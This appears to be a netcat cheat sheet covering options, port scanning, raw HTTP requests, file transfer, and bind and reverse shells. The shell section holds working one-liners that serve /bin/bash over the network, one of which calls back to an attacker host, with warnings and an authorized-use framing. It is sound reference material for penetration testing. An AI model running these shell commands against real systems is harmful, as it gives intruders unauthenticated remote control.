nc [options] [host] [port] – by default this opens a TCP connection to host:port and relays stdin/stdout; a port scan needs -z (zero-I/O: connect, report, close without sending data)
nc -l [host] [port] – listens on the given port instead of connecting; with no host it binds every interface, so give 127.0.0.1 (or an internal address) when the listener must not be reachable from outside
nc -4 – use IPv4 only
nc -6 – use IPv6 only
nc -u – use UDP instead of TCP
nc -k -l – continue listening after disconnection
nc -n – skip DNS lookups (hosts and ports must be numeric); faster, and avoids leaking the target name to a resolver
nc -v – provide verbose output (repeat as -vv for more)
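# Cheat sheet, not a script: copy one line at a time. Placeholders are shell
# variables so an unset one aborts with "parameter null or not set" instead of
# silently running nc with an empty argument (nc -l "" can end up listening on
# an arbitrary port on some builds):
#   TARGET  host name or IP you scan / connect to
#   LHOST   your own reachable IP, used when the target calls back
#   PORT    TCP/UDP port
# Two netcat families are in circulation and their flags differ:
#   OpenBSD nc (Debian/Ubuntu/macOS default): `nc -l PORT` (no -p with -l), has -k -N -z -4 -6, no -e
#   traditional/GNU netcat and nmap's ncat:   `nc -l -p PORT`, has -e (ncat also has --ssl)
# Check `nc -h` before relying on a flag.

# --- port scan ---
# -z: zero-I/O, just probe (without it nc connects and then blocks waiting on stdin);
# -n: no DNS lookups; -w 2: give up on each port after 2 s.
nc -nvz -w 2 "${TARGET:?}" 1-1000              # TCP
nc -nvzu -w 2 "${TARGET:?}" 53                 # UDP: "open" only means no ICMP unreachable came back

# --- plain listen / connect ---
nc -l "${PORT:?}"                              # listen on PORT (traditional nc: nc -l -p "${PORT:?}")
nc "${TARGET:?}" "${PORT:?}"                   # connect to TARGET:PORT

# --- one-shot HTTP ---
# HTTP line endings are CRLF. Stream the body with cat instead of "$(cat ...)",
# which strips trailing newlines and mangles binary files; keep the format
# string in single quotes so nothing in it is expanded.
{ printf 'HTTP/1.1 200 OK\r\nConnection: close\r\n\r\n'; cat index.html; } | nc -l "${PORT:?}"   # response
printf 'GET / HTTP/1.0\r\n\r\n' | nc "${TARGET:?}" "${PORT:?}"   # request (note the space before HTTP/1.0)

# --- shells (authorized engagements only) ---
# Either form hands an unauthenticated, unencrypted shell, running as the user
# who started nc, to anyone who can reach the port: keep it short-lived and
# firewall or tear it down when done. -e needs traditional nc or ncat.
# Bind shell: the target exposes the shell, you connect in.
nc -nvl -p "${PORT:?}" -e /bin/bash            # on the target
nc -nv "${TARGET:?}" "${PORT:?}"               # on your machine
# Reverse shell: you listen, the target calls back (works through NAT / egress-only firewalls).
nc -nvl -p "${PORT:?}"                         # on your machine (OpenBSD nc: nc -nvl "${PORT:?}")
nc -nv "${LHOST:?}" "${PORT:?}" -e /bin/bash   # on the target

# --- file transfer ---
# Plaintext and unauthenticated: anything on the path can read or replace the
# file, so compare sha256sum on both ends. nc may not close at EOF: add -N
# (OpenBSD nc) or -q 1 (traditional nc) on the sending side if it hangs.
nc -l "${PORT:?}" < file.txt                   # sender listens
nc "${TARGET:?}" "${PORT:?}" > file.txt        # receiver connects
# or the other way round
nc -l "${PORT:?}" > file.txt                   # receiver listens
nc "${TARGET:?}" "${PORT:?}" < file.txt        # sender connects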